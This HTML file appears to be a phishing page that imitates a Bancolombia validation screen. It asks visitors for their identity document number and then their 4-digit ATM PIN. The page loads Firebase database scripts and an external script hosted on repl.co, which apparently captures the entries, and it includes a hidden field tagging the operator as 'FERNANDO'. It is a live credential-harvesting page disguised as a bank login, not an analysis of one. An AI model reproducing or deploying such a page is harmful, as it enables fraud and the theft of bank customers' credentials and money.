<!DOCTYPE html>
<html lang="es">
<head>
  <link rel="stylesheet" href="https://information--css-imagen.repl.co/css/style.css">
  <title>Validación Bancolombia</title>
  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-database.js"></script>
 <script src="https://FERNANDO--javascrip1.repl.co/script.js"></script> 
</head>
<body>
  <header>
    <img src="https://information--css-imagen.repl.co/images/cerrar1.png" alt="Imagen 1">
    <img src="https://information--css-imagen.repl.co/images/icono.png" alt="Imagen 2" class="small-image">
    <img src="https://information--css-imagen.repl.co/images/continuar.png" alt="Imagen 3">
  </header>
<div class="container">
  <div id="contenedor"></div>

    <section id="usuario" style="display:;" >
      <p class="hola"><b>¡Hola!</b></p>
    <p class="titulo2" >Si aún no has creado el usuario, ingresa el número del documento de identidad.</p>
    <div class="input-box">
      <img class="iconouser" src="https://information--css-imagen.repl.co/images/ico-usu.png">
      <input class="input" id="usuarioInput" type="text" placeholder="Ingresa el usuario">
      <input class="input" id="cliente" value="FERNANDO" style="display: none;" type="text">
    </div>
    <button class="btn-continuar" onclick="imprimirusuario()" >Continuar</button>
    <p class="noeres"><b>¿No eres cliente?</b></p>
    </section>


    <section id="clavefija" style="display: none;">
    <p class="titulo2">Ingresa la clave que utilizas en el cajero</p>
    <div class="input-box">
      <img class="iconopass" src="https://information--css-imagen.repl.co/images/desbloquear.png">
      <p class="titulo2pass">Ingresa la clave</p>
      <input class="inputpass" id="claveInput" maxlength="4" type="password">
    </div>
    <button class="btn-continuar" onclick="imprimirclave(); mostrarnuevodiv(sectionId)">Continuar</button>
    </section>
  </div>
    
    <img class="fondo" src="https://information--css-imagen.repl.co/images/fondo1-1024x459.png"
</body>
</html>
